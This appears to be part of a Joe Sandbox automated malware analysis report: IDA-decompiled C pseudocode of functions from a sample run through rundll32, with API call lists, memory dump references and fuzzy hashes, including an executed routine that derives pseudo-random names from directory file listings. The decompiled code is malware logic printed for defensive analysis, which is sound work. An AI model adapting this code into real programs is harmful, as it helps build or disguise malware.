                                                  						} else {
                                                  							_t8 = Process32Next(_t17,  &_v300);
                                                  							continue;
                                                  						}
                                                  						L7:
                                                  						CloseHandle(_t17);
                                                  						goto L8;
                                                  					}
                                                  					goto L7;
                                                  				}
                                                  				L8:
                                                  				return _t15;
                                                  			}










                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04F4758F
                                                  • Process32First.KERNEL32(00000000,?), ref: 04F475A2
                                                  • Process32Next.KERNEL32(00000000,?), ref: 04F475CE
                                                  • CloseHandle.KERNEL32(00000000), ref: 04F475DD
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 420147892-0
                                                  • Opcode ID: 2aef96ceb2aa6c3f66ba3ae308818efde2ac690cb00b6f7bc6c9ce6125616dc4
                                                  • Instruction ID: 2814361fefc9cba75d1f7b8cdc748bd1a28861e30b1f32faeb8aa835bd203684
                                                  • Opcode Fuzzy Hash: 2aef96ceb2aa6c3f66ba3ae308818efde2ac690cb00b6f7bc6c9ce6125616dc4
                                                  • Instruction Fuzzy Hash: 5DF090766051296AEB20B6769C48EEB3BECDBC5614F004061F906D7000FF68EE4B8AA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E04F47C61(void* __esi) {
                                                  				struct _SECURITY_ATTRIBUTES* _v4;
                                                  				void* _t8;
                                                  				void* _t10;
                                                  
                                                  				_v4 = 0;
                                                  				memset(__esi, 0, 0x38);
                                                  				_t8 = CreateEventA(0, 1, 0, 0);
                                                  				 *(__esi + 0x1c) = _t8;
                                                  				if(_t8 != 0) {
                                                  					_t10 = CreateEventA(0, 1, 1, 0);
                                                  					 *(__esi + 0x20) = _t10;
                                                  					if(_t10 == 0) {
                                                  						CloseHandle( *(__esi + 0x1c));
                                                  					} else {
                                                  						_v4 = 1;
                                                  					}
                                                  				}
                                                  				return _v4;
                                                  			}







                                                  APIs
                                                  • memset.NTDLL ref: 04F47C6F
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,751881D0), ref: 04F47C84
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 04F47C91
                                                  • CloseHandle.KERNEL32(?), ref: 04F47CA3
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: CreateEvent$CloseHandlememset
                                                  • String ID:
                                                  • API String ID: 2812548120-0
                                                  • Opcode ID: de5fdd6b82c0a659f3937c6ae03a669d35483d2e2e8df7fd8a92623456471e9b
                                                  • Instruction ID: 427d0d39fbe8e7a9aad595c55308757a91b29199d66b81353927a50a9892ccbd
                                                  • Opcode Fuzzy Hash: de5fdd6b82c0a659f3937c6ae03a669d35483d2e2e8df7fd8a92623456471e9b
                                                  • Instruction Fuzzy Hash: D1F0F4B550530CBFE3106F66ECC0D27BFECFBC51D9B11492DF14581541DA36A81A9AB0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 50%
                                                  			E04F475E9(void** __esi) {
                                                  				char* _v0;
                                                  				intOrPtr _t4;
                                                  				intOrPtr _t6;
                                                  				void* _t8;
                                                  				intOrPtr _t11;
                                                  				void* _t12;
                                                  				void** _t14;
                                                  
                                                  				_t14 = __esi;
                                                  				_t4 =  *0x4f4d32c; // 0x70795b0
                                                  				__imp__(_t4 + 0x40);
                                                  				while(1) {
                                                  					_t6 =  *0x4f4d32c; // 0x70795b0
                                                  					_t1 = _t6 + 0x58; // 0x0
                                                  					if( *_t1 == 0) {
                                                  						break;
                                                  					}
                                                  					Sleep(0xa);
                                                  				}
                                                  				_t8 =  *_t14;
                                                  				if(_t8 != 0 && _t8 != 0x4f4d030) {
                                                  					HeapFree( *0x4f4d238, 0, _t8);
                                                  				}
                                                  				_t14[1] = E04F494A9(_v0, _t14);
                                                  				_t11 =  *0x4f4d32c; // 0x70795b0
                                                  				_t12 = _t11 + 0x40;
                                                  				__imp__(_t12);
                                                  				return _t12;
                                                  			}











                                                  APIs
                                                  • RtlEnterCriticalSection.NTDLL(07079570), ref: 04F475F2
                                                  • Sleep.KERNEL32(0000000A,?,04F423DE), ref: 04F475FC
                                                  • HeapFree.KERNEL32(00000000,00000000,?,04F423DE), ref: 04F47624
                                                  • RtlLeaveCriticalSection.NTDLL(07079570), ref: 04F47640
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                  • String ID:
                                                  • API String ID: 58946197-0
                                                  • Opcode ID: 98fd3952970f5acca50eb11db9b8e21de41de589f3ee815fd783a14dc8b2885f
                                                  • Instruction ID: abcc43ddf9315aa22f300282e031fe99557b31c39505084b10fe12a7032ca1c2
                                                  • Opcode Fuzzy Hash: 98fd3952970f5acca50eb11db9b8e21de41de589f3ee815fd783a14dc8b2885f
                                                  • Instruction Fuzzy Hash: 38F0D479A01285DBE760AB7DF948E167BE8EFA4740B058405F802D7250EF7CEC02CA25
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E04F4970F() {
                                                  				void* _t1;
                                                  				intOrPtr _t5;
                                                  				void* _t6;
                                                  				void* _t7;
                                                  				void* _t11;
                                                  
                                                  				_t1 =  *0x4f4d26c; // 0x31c
                                                  				if(_t1 == 0) {
                                                  					L8:
                                                  					return 0;
                                                  				}
                                                  				SetEvent(_t1);
                                                  				_t11 = 0x7fffffff;
                                                  				while(1) {
                                                  					SleepEx(0x64, 1);
                                                  					_t5 =  *0x4f4d2b8; // 0x0
                                                  					if(_t5 == 0) {
                                                  						break;
                                                  					}
                                                  					_t11 = _t11 - 0x64;
                                                  					if(_t11 > 0) {
                                                  						continue;
                                                  					}
                                                  					break;
                                                  				}
                                                  				_t6 =  *0x4f4d26c; // 0x31c
                                                  				if(_t6 != 0) {
                                                  					CloseHandle(_t6);
                                                  				}
                                                  				_t7 =  *0x4f4d238; // 0x6c80000
                                                  				if(_t7 != 0) {
                                                  					HeapDestroy(_t7);
                                                  				}
                                                  				goto L8;
                                                  			}









                                                  APIs
                                                  • SetEvent.KERNEL32(0000031C,00000001,04F48099), ref: 04F4971A
                                                  • SleepEx.KERNEL32(00000064,00000001), ref: 04F49729
                                                  • CloseHandle.KERNEL32(0000031C), ref: 04F4974A
                                                  • HeapDestroy.KERNEL32(06C80000), ref: 04F4975A
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: CloseDestroyEventHandleHeapSleep
                                                  • String ID:
                                                  • API String ID: 4109453060-0
                                                  • Opcode ID: d41ef18eacf5a4e8c319b9a678b9b872b3ed9f23289c6f47334b09af2026e91b
                                                  • Instruction ID: 07266ab1fcee57a04b84986f62d1ebd6335b569af71b559f67d7ea5ca25ac0f2
                                                  • Opcode Fuzzy Hash: d41ef18eacf5a4e8c319b9a678b9b872b3ed9f23289c6f47334b09af2026e91b
                                                  • Instruction Fuzzy Hash: 95F030B9B063185BFB20AE79B988F073BA8EBA0B61B050610F814D7780DF6CED40D750
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 37%
                                                  			E04F4A5D6() {
                                                  				void* _v0;
                                                  				void** _t3;
                                                  				void** _t5;
                                                  				void** _t7;
                                                  				void** _t8;
                                                  				void* _t10;
                                                  
                                                  				_t3 =  *0x4f4d32c; // 0x70795b0
                                                  				__imp__( &(_t3[0x10]));
                                                  				while(1) {
                                                  					_t5 =  *0x4f4d32c; // 0x70795b0
                                                  					_t1 =  &(_t5[0x16]); // 0x0
                                                  					if( *_t1 == 0) {
                                                  						break;
                                                  					}
                                                  					Sleep(0xa);
                                                  				}
                                                  				_t7 =  *0x4f4d32c; // 0x70795b0
                                                  				_t10 =  *_t7;
                                                  				if(_t10 != 0 && _t10 != 0x4f4e836) {
                                                  					HeapFree( *0x4f4d238, 0, _t10);
                                                  					_t7 =  *0x4f4d32c; // 0x70795b0
                                                  				}
                                                  				 *_t7 = _v0;
                                                  				_t8 =  &(_t7[0x10]);
                                                  				__imp__(_t8);
                                                  				return _t8;
                                                  			}

                                                  APIs
                                                  • RtlEnterCriticalSection.NTDLL(07079570), ref: 04F4A5DF
                                                  • Sleep.KERNEL32(0000000A,?,04F423DE), ref: 04F4A5E9
                                                  • HeapFree.KERNEL32(00000000,?,?,04F423DE), ref: 04F4A617
                                                  • RtlLeaveCriticalSection.NTDLL(07079570), ref: 04F4A62C
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                   • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp
                                                   • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp
                                                   • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp
                                                   • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                  • String ID:
                                                  • API String ID: 58946197-0
                                                  • Opcode ID: 2d7778a2e1d11ab6529e510e3ec55e1bccc90ca97b05462d2f76ed71f314b1eb
                                                  • Instruction ID: a2ab8f29009bad994c797a47d32d6925cbb8913d053e931ed3afba1b5b4e46a6
                                                  • Opcode Fuzzy Hash: 2d7778a2e1d11ab6529e510e3ec55e1bccc90ca97b05462d2f76ed71f314b1eb
                                                  • Instruction Fuzzy Hash: 53F0D47DA411449BE7189F39F959E267BA4EBE8701B058409E802DB254CF3CEC01CE24
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 58%
                                                  			E04F47F27(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                                  				intOrPtr* _v8;
                                                  				void* _t17;
                                                  				intOrPtr* _t22;
                                                  				void* _t27;
                                                  				char* _t30;
                                                  				void* _t33;
                                                  				void* _t34;
                                                  				void* _t36;
                                                  				void* _t37;
                                                  				void* _t39;
                                                  				int _t42;
                                                  
                                                  				_t17 = __eax;
                                                  				_t37 = 0;
                                                  				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                                  				_t2 = _t17 + 1; // 0x1
                                                  				_t28 = _t2;
                                                  				_t34 = E04F42049(_t2);
                                                  				if(_t34 != 0) {
                                                  					_t30 = E04F42049(_t28);
                                                  					if(_t30 == 0) {
                                                  						E04F49039(_t34);
                                                  					} else {
                                                  						_t39 = _a4;
                                                  						_t22 = E04F4A911(_t39);
                                                  						_v8 = _t22;
                                                  						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                                  							_a4 = _t39;
                                                  						} else {
                                                  							_t26 = _t22 + 2;
                                                  							_a4 = _t22 + 2;
                                                  							_t22 = E04F4A911(_t26);
                                                  							_v8 = _t22;
                                                  						}
                                                  						if(_t22 == 0) {
                                                  							__imp__(_t34, _a4);
                                                  							 *_t30 = 0x2f;
                                                  							 *((char*)(_t30 + 1)) = 0;
                                                  						} else {
                                                  							_t42 = _t22 - _a4;
                                                  							memcpy(_t34, _a4, _t42);
                                                  							 *((char*)(_t34 + _t42)) = 0;
                                                  							__imp__(_t30, _v8);
                                                  						}
                                                  						 *_a8 = _t34;
                                                  						_t37 = 1;
                                                  						 *_a12 = _t30;
                                                  					}
                                                  				}
                                                  				return _t37;
                                                  			}

                                                  APIs
                                                  • lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,04F415A4,?,?,?,?,00000102,04F411DA,?,?,00000000), ref: 04F47F33
                                                    • Part of subcall function 04F42049: RtlAllocateHeap.NTDLL(00000000,00000000,04F47E50), ref: 04F42055
                                                    • Part of subcall function 04F4A911: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04F47F61,00000000,00000001,00000001,?,?,04F415A4,?,?,?,?,00000102), ref: 04F4A91F
                                                    • Part of subcall function 04F4A911: StrChrA.SHLWAPI(?,0000003F,?,?,04F415A4,?,?,?,?,00000102,04F411DA,?,?,00000000,00000000), ref: 04F4A929
                                                  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04F415A4,?,?,?,?,00000102,04F411DA,?), ref: 04F47F91
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 04F47FA1
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 04F47FAD
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                   • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp
                                                   • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp
                                                   • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp
                                                   • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                  • String ID:
                                                  • API String ID: 3767559652-0
                                                  • Opcode ID: ab20cb696eff27e145f13e1dec3614f22945779acced2a79a6aa44a8296a81b9
                                                  • Instruction ID: 45f654e65c1f01bf35c60251ad33ffe970e5ee0481e0a9a68f2b3f22d3d578aa
                                                  • Opcode Fuzzy Hash: ab20cb696eff27e145f13e1dec3614f22945779acced2a79a6aa44a8296a81b9
                                                  • Instruction Fuzzy Hash: CD210532904215FFDB12AFA8DC44AAEBFE8EF85294B064054F8059B201DF34E90287F0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E04F47CB8(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                  				void* _v8;
                                                  				void* _t18;
                                                  				int _t25;
                                                  				int _t29;
                                                  				int _t34;
                                                  
                                                  				_t29 = lstrlenW(_a4);
                                                  				_t25 = lstrlenW(_a8);
                                                  				_t18 = E04F42049(_t25 + _t29 + _t25 + _t29 + 2);
                                                  				_v8 = _t18;
                                                  				if(_t18 != 0) {
                                                  					_t34 = _t29 + _t29;
                                                  					memcpy(_t18, _a4, _t34);
                                                  					_t10 = _t25 + 2; // 0x2
                                                  					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                                  				}
                                                  				return _v8;
                                                  			}

                                                  APIs
                                                  • lstrlenW.KERNEL32(004F0053,75145520,?,00000008,0707937C,?,04F4747C,004F0053,0707937C,?,?,?,?,?,?,04F46814), ref: 04F47CC8
                                                  • lstrlenW.KERNEL32(04F4747C,?,04F4747C,004F0053,0707937C,?,?,?,?,?,?,04F46814), ref: 04F47CCF
                                                    • Part of subcall function 04F42049: RtlAllocateHeap.NTDLL(00000000,00000000,04F47E50), ref: 04F42055
                                                  • memcpy.NTDLL(00000000,004F0053,751469A0,?,?,04F4747C,004F0053,0707937C,?,?,?,?,?,?,04F46814), ref: 04F47CEF
                                                  • memcpy.NTDLL(751469A0,04F4747C,00000002,00000000,004F0053,751469A0,?,?,04F4747C,004F0053,0707937C), ref: 04F47D02
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                   • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp
                                                   • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp
                                                   • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp
                                                   • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: lstrlenmemcpy$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 2411391700-0
                                                  • Opcode ID: 7563674388df65e267971cbd411544c63fb4d217d5bd615551505a22001507db
                                                  • Instruction ID: d07eba62d34051b20320f290693a1c43cfdad5629bbc59c9949b1e7873ec2b9d
                                                  • Opcode Fuzzy Hash: 7563674388df65e267971cbd411544c63fb4d217d5bd615551505a22001507db
                                                  • Instruction Fuzzy Hash: DDF03C76900118BBDB11EFA8CC44CDE7BACEE492587014062AA08D7211EA31EA158BA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • lstrlen.KERNEL32(070787FA,00000000,00000000,74ECC740,04F4A453,00000000), ref: 04F43CD8
                                                  • lstrlen.KERNEL32(?), ref: 04F43CE0
                                                    • Part of subcall function 04F42049: RtlAllocateHeap.NTDLL(00000000,00000000,04F47E50), ref: 04F42055
                                                  • lstrcpy.KERNEL32(00000000,070787FA), ref: 04F43CF4
                                                  • lstrcat.KERNEL32(00000000,?), ref: 04F43CFF
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                   • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp
                                                   • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp
                                                   • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp
                                                   • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                  • String ID:
                                                  • API String ID: 74227042-0
                                                  • Opcode ID: 177bdaa99f51e1ba5d1312b1daeda08da36c5ca83d0912255ad3cc8469186069
                                                  • Instruction ID: 372208d5f31732e721a3e0f65112ac1e68060c26d2b3cbadec7f71ee93abfc36
                                                  • Opcode Fuzzy Hash: 177bdaa99f51e1ba5d1312b1daeda08da36c5ca83d0912255ad3cc8469186069
                                                  • Instruction Fuzzy Hash: D1E09237A02268A787119FE9BC48C6FBBADEFD96517064426FA00D3110DF289C018BE1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Executed Functions

                                                  Control-flow Graph

                                                  C-Code - Quality: 93%
                                                  			E052D12D4(signed char* __eax, intOrPtr* _a4) {
                                                  				signed int _v12;
                                                  				void* _v16;
                                                  				CHAR* _v20;
                                                  				struct _FILETIME _v28;
                                                  				void* _v32;
                                                  				void* _v36;
                                                  				char* _v40;
                                                  				signed int _v44;
                                                  				long _v344;
                                                  				struct _WIN32_FIND_DATAA _v368;
                                                  				signed int _t72;
                                                  				void* _t74;
                                                  				signed int _t76;
                                                  				void* _t78;
                                                  				intOrPtr _t81;
                                                  				CHAR* _t83;
                                                  				void* _t85;
                                                  				signed char _t89;
                                                  				signed char _t91;
                                                  				intOrPtr _t93;
                                                  				void* _t96;
                                                  				long _t99;
                                                  				int _t101;
                                                  				signed int _t109;
                                                  				char* _t111;
                                                  				void* _t113;
                                                  				int _t119;
                                                  				char _t128;
                                                  				void* _t134;
                                                  				signed int _t136;
                                                  				char* _t139;
                                                  				signed int _t140;
                                                  				char* _t141;
                                                  				char* _t146;
                                                  				signed char* _t148;
                                                  				int _t151;
                                                  				void* _t152;
                                                  				void* _t153;
                                                  				void* _t154;
                                                  				void* _t165;
                                                  
                                                  				_v12 = _v12 & 0x00000000;
                                                  				_t148 = __eax;
                                                  				_t72 =  *0x52dd278; // 0x63699bc3
                                                  				_t74 = RtlAllocateHeap( *0x52dd238, 0, _t72 ^ 0x63699ac7);
                                                  				_v20 = _t74;
                                                  				if(_t74 == 0) {
                                                  					L36:
                                                  					return _v12;
                                                  				}
                                                  				_t76 =  *0x52dd278; // 0x63699bc3
                                                  				_t78 = RtlAllocateHeap( *0x52dd238, 0, _t76 ^ 0x63699bce);
                                                  				_t146 = 0;
                                                  				_v36 = _t78;
                                                  				if(_t78 == 0) {
                                                  					L35:
                                                  					HeapFree( *0x52dd238, _t146, _v20);
                                                  					goto L36;
                                                  				}
                                                  				_t136 =  *0x52dd278; // 0x63699bc3
                                                  				memset(_t78, 0, _t136 ^ 0x63699bce);
                                                  				_t81 =  *0x52dd27c; // 0x202a5a8
                                                  				_t154 = _t153 + 0xc;
                                                  				_t5 = _t81 + 0x52de7f2; // 0x73797325
                                                  				_t83 = E052D95B1(_t5);
                                                  				_v20 = _t83;
                                                  				if(_t83 == 0) {
                                                  					L34:
                                                  					HeapFree( *0x52dd238, _t146, _v36);
                                                  					goto L35;
                                                  				}
                                                  				_t134 = 0xffffffffffffffff;
                                                  				_v28.dwLowDateTime = 0x63699bce;
                                                  				_v28.dwHighDateTime = 0x63699bce;
                                                  				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                                  				_v32 = _t85;
                                                  				if(_t85 != 0x63699bce) {
                                                  					GetFileTime(_t85,  &_v28, 0, 0);
                                                  					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
                                                  					asm("adc dword [ebp-0x14], 0xc9"); // executed
                                                  					FindCloseChangeNotification(_v32); // executed
                                                  				}
                                                  				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
                                                  				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
                                                  				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
                                                  				 *_t148 = _t91;
                                                  				_v32 = _t91 & 0x000000ff;
                                                  				_t93 =  *0x52dd27c; // 0x202a5a8
                                                  				_t16 = _t93 + 0x52de813; // 0x642e2a5c
                                                  				_v40 = _t146;
                                                  				_v44 = _t89 & 0x000000ff;
                                                  				__imp__(_v20, _t16);
                                                  				_t96 = FindFirstFileA(_v20,  &_v368); // executed
                                                  				_v16 = _t96;
                                                  				if(_t96 == _t134) {
                                                  					_t146 = 0;
                                                  					goto L34;
                                                  				}
                                                  				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                                                  				while(_t99 > 0) {
                                                  					_t101 = FindNextFileA(_v16,  &_v368); // executed
                                                  					if(_t101 == 0) {
                                                  						FindClose(_v16);
                                                  						_v16 = FindFirstFileA(_v20,  &_v368);
                                                  						_v28.dwHighDateTime = _v344;
                                                  						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
                                                  					}
                                                  					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                                                  				}
                                                  				_v12 = _v12 & 0x00000000;
                                                  				while(1) {
                                                  					_t109 = _v44;
                                                  					if(_v12 <= _t109) {
                                                  						goto L15;
                                                  					}
                                                  					_t140 = _v12;
                                                  					if(_t140 > _v32) {
                                                  						_t141 = _v36;
                                                  						 *_a4 = _t141;
                                                  						while(1) {
                                                  							_t128 =  *_t141;
                                                  							if(_t128 == 0) {
                                                  								break;
                                                  							}
                                                  							if(_t128 < 0x30) {
                                                  								 *_t141 = _t128 + 0x20;
                                                  							}
                                                  							_t141 = _t141 + 1;
                                                  						}
                                                  						_v12 = 1;
                                                  						FindClose(_v16); // executed
                                                  						_t146 = 0;
                                                  						goto L35;
                                                  					}
                                                  					_t165 = _t140 - _t109;
                                                  					L15:
                                                  					if(_t165 == 0 || _v12 == _v32) {
                                                  						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
                                                  						_t139 = _v40;
                                                  						_t151 = _t111 -  &(_v368.cFileName);
                                                  						_t113 = 0;
                                                  						if(_t139 != 0) {
                                                  							_t48 = _t151 - 4; // -4
                                                  							_t113 = _t48;
                                                  							if(_t113 > _t151) {
                                                  								_t113 = 0;
                                                  							}
                                                  						}
                                                  						if(_t151 > 4) {
                                                  							_t151 = 4;
                                                  						}
                                                  						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
                                                  						_t154 = _t154 + 0xc;
                                                  						_v40 =  &(_v40[_t151]);
                                                  					}
                                                  					do {
                                                  						_t119 = FindNextFileA(_v16,  &_v368); // executed
                                                  						if(_t119 == 0) {
                                                  							FindClose(_v16);
                                                  							_v16 = FindFirstFileA(_v20,  &_v368);
                                                  						}
                                                  					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
                                                  					_v12 = _v12 + 1;
                                                  				}
                                                  			}

                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 052D12FF
                                                  • RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 052D1321
                                                  • memset.NTDLL ref: 052D133B
                                                    • Part of subcall function 052D95B1: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,052D23E9,63699BCE,052D1354,73797325), ref: 052D95C2
                                                    • Part of subcall function 052D95B1: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 052D95DC
                                                  • CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 052D1379
                                                  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 052D138D
                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 052D13A4
                                                  • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 052D13B0
                                                  • lstrcat.KERNEL32(?,642E2A5C), ref: 052D13F1
                                                  • FindFirstFileA.KERNELBASE(?,?), ref: 052D1407
                                                  • CompareFileTime.KERNEL32(?,?), ref: 052D1425
                                                  • FindNextFileA.KERNELBASE(052D96C1,?), ref: 052D1439
                                                  • FindClose.KERNEL32(052D96C1), ref: 052D1446
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 052D1452
                                                  • CompareFileTime.KERNEL32(?,?), ref: 052D1474
                                                  • StrChrA.SHLWAPI(?,0000002E), ref: 052D14A7
                                                  • memcpy.NTDLL(00000000,?,00000000), ref: 052D14E0
                                                  • FindNextFileA.KERNELBASE(052D96C1,?), ref: 052D14F5
                                                  • FindClose.KERNEL32(052D96C1), ref: 052D1502
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 052D150E
                                                  • CompareFileTime.KERNEL32(?,?), ref: 052D151E
                                                  • FindClose.KERNELBASE(052D96C1), ref: 052D1553
                                                  • HeapFree.KERNEL32(00000000,00000000,73797325), ref: 052D1565
                                                  • HeapFree.KERNEL32(00000000,?), ref: 052D1575
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
                                                  • String ID:
                                                  • API String ID: 2944988578-0
                                                  • Opcode ID: 535779f916799ee5f35d1ac6d10383e1e239dfd857539847a56e51507d21432e
                                                  • Instruction ID: 7bcb5c4cd826efc6cefd3bde21c20b309249ec7754051383348c3bb87ecd934d
                                                  • Opcode Fuzzy Hash: 535779f916799ee5f35d1ac6d10383e1e239dfd857539847a56e51507d21432e
